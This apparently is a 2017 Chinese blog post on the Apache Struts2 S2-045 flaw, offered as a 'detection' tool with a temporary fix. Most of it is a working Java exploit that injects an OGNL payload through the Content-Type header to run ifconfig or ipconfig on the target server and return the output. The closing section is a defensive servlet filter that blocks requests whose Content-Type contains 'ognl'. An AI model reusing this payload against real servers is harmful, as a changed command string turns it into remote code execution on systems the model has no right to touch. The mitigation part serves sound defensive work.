struts2 s2-045漏洞检测 &临时解决方案

时间:2017-03-09
struts2 漏洞检测代码      (文件上传代码和 exce命令来均自网络 懒得自己写)
  
  public static String upload(String url,String filePath){
       String fdfsPath = "";
       try {


           DefaultHttpClient httpclient = new DefaultHttpClient();
           HttpPost httppost = new HttpPost(url);
           File file = new File(filePath);
           String name = file.getName();
           InputStream in = new FileInputStream(file);
           MultipartEntity reqEntity = new MultipartEntity();
           InputStreamBody inputStreamBody = new InputStreamBody(in,name);
           StringBody fileNam = new StringBody(name);
           StringBody dateFlag = new StringBody("20160122152301");
           StringBody datumType = new StringBody("0");
           StringBody uploadWay = new StringBody("0");
           StringBody userId = new StringBody("0538");
           StringBody tenderId = new StringBody("2315");
           StringBody metrialsType = new StringBody("25");
           StringBody ip = new StringBody("0.0.0.1");
           StringBody driverName = new StringBody("huawei");
           StringBody systemVersion = new StringBody("djf");
           StringBody position = new StringBody("信息路38",  Charset.forName("utf8")); 
           reqEntity.addPart("datums", inputStreamBody);
           reqEntity.addPart("fileName", fileNam);
           reqEntity.addPart("dateFlag", dateFlag);
           reqEntity.addPart("datumType", datumType);
           reqEntity.addPart("uploadWay", uploadWay);
           reqEntity.addPart("userId", userId);
           reqEntity.addPart("tenderId", tenderId);
           reqEntity.addPart("metrialsType", metrialsType);
           reqEntity.addPart("ip", ip);
           reqEntity.addPart("driverName", driverName);
           reqEntity.addPart("systemVersion", systemVersion);
           reqEntity.addPart("position", position);  
   //linux
          // httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"); 
            //windows
   httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ipconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"); 
           httppost.addHeader("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36");
           HttpResponse response = httpclient.execute(httppost);
           int statusCode = response.getStatusLine().getStatusCode();


           if(statusCode == HttpStatus.SC_OK){


               System.out.println("服务器正常响应.....");


               HttpEntity resEntity = response.getEntity();
               System.out.println(EntityUtils.toString(resEntity));//httpclient自带的工具类读取返回数据


               System.out.println(resEntity.getContent());


               EntityUtils.consume(resEntity);
           }else{
             System.out.println(HttpStatus.getStatusText(statusCode));
           }
       } catch (Exception e) {
           e.printStackTrace();
       }
       System.out.println("结束....");
       return "";
   }


 
public static void main(String args[]) throws IOException {
System.out.println("开始....");
upload("http://www.xxx.cn/website/index.do","E:\\www\\index.txt"); 
}

------------------------------------------------------------------------------------------------
临时解决办法
ForbiddenAccessFilter.java


public class ForbiddenAccessFilter extends OncePerRequestFilter { 


protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response,
FilterChain chain) throws ServletException, IOException {
String contentType=request.getContentType();
if(contentType!=null&&contentType.indexOf("ognl")!=-1){ 
System.out.println(contentType);
return;
}else{  
chain.doFilter(request, response);
}
}
 
}


web.xml 配置
<filter>
<filter-name>forbiddenAccessFilter</filter-name>
<filter-class>com.ahtec.webapp.filters.ForbiddenAccessFilter</filter-class>
</filter>
<filter-mapping>
<filter-name>forbiddenAccessFilter</filter-name>
<url-pattern>/*</url-pattern>

</filter-mapping>

上一条:Linux 下zip包的压缩与解压 下一条:【大拿分享】说说劫持的哪些事

相关文章

最新文章